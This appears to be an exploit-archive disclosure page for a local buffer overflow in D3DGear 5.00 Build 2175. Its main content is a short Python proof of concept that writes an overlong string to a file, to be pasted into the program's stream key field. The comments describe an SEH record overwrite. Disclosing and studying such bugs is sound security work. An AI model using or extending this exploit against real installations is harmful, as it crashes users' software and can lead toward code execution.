D3DGear 5.00 Build 2175 Buffer Overflow

2018.01.03

Credit: bzyo

Risk: High

Local: Yes

Remote: No

CVE: N/A

CWE: CWE-119

#!/usr/bin/python
 
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: D3DGear 5.00 Build 2175 - Buffer Overflow
# Date: 07-11-2017
# Vulnerable Software: D3DGear 5.00 Build 2175
# Vendor Homepage: http://www.d3dgear.com/
# Version: 5.00 Build 2175
# Software Link: http://www.d3dgear.com/products.htm
# Tested On: Windows 7 x86
#
#
# PoC: generate crash.txt, open program, select broadcast, paste crash.txt contents in stream key
#
# app crashes; 00420042 Pointer to next SEH record; no eip overwrite; one unicode ppr pointer
#
  
file = "crash.txt"

buffer = "A"* 1284 + "B"*4
writeFile = open (file, "w")
writeFile.write( buffer )
writeFile.close()

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

D3DGear 5.00 Build 2175 Buffer Overflow

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.